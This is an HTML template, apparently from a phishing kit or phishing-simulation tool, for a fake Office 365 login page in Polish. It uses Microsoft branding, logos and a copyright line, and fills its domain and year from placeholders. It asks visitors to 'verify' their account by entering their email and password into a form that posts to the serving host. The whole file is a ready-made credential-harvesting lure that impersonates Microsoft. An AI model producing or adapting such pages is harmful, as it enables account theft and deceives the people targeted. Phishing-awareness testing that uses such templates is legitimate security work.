<html>
  <head>
    <title>Office 365 | Microsoft Office</title>
    <meta charset="utf-8" />
    <link
      rel="icon"
      type="image/png"
      href="{domain}/static/office-365-icon.png"
    />
    <style>
      html, body {
        height: 100%;
      }
      body {
        font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
        margin: 0;
      }
      *:focus {
        outline: none;
      }
      a:link,
      a:active,
      a:visited,
      a:hover {
        font-weight: normal;
        color: #0068b7;
        text-decoration: none;
      }
      .ButtonLink {
        font-weight: normal;
        font-size: 16px;
        color: #ffffff;
        text-decoration: none;
        background: none;
        border: none;
        cursor: pointer;
      }
      h1,
      h2,
      h3 {
        font-weight: normal;
      }
      h1 {
        font-size: 36px;
      }
      input[type="email"]:focus,
      input[type="password"]:focus {
        border-bottom-width: 1.5px;
      }
      input[type="email"],
      input[type="password"] {
        width: 100%;
        padding: 0px 0px 10px 0px;
        margin: 8px 0;
        border: none;
        border-bottom: 1px solid #0067b8;
        font-size: 14px;
        font-weight: normal;
      }
    </style>
  </head>
  <body bgcolor="#FFFFFF" background="{domain}/static/Background.jpg">
    <table
      cellspacing="0"
      cellpadding="0"
      border="0"
      width="100%"
      height="100%"
    >
      <tr>
        <td valign="middle" align="center">
          <table
            cellspacing="0"
            cellpadding="45"
            border="0"
            width="600"
            bgcolor="#FFFFFF"
          >
            <tr>
              <td>
                <p>
                  <img
                    src="{domain}/static/windows_logo.png"
                    border="0"
                    alt=""
                  />
                </p>
              </td>
            </tr>
            <tr>
              <td>
                <h2>Wprowadź poświadczenia do Twojego konta</h2>
                <p>
                  Wpisz poświadczenia użytkownika usługi Office 365, aby zweryfikować swoje konto.
                </p>

                <form method="post">
                  <label>Adres e-mail:</label><br />
                  <input type="email" value="" required /><br />
                  <label>Hasło:</label><br />
                  <input type="password" value="" required />
                  <table
                    cellspacing="0"
                    cellpadding="15"
                    border="0"
                    bgcolor="#0068b7"
                  >
                    <tr>
                      <td>
                        <input
                          type="submit"
                          value="Weryfikuj"
                          class="ButtonLink"
                          name="subscribe"
                        />
                      </td>
                    </tr>
                  </table>
                </form>
              </td>
            </tr>
            <tr>
              <td>
                <p>&copy; 2002-{current_year} Microsoft Corporation</p>
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
  </body>
</html>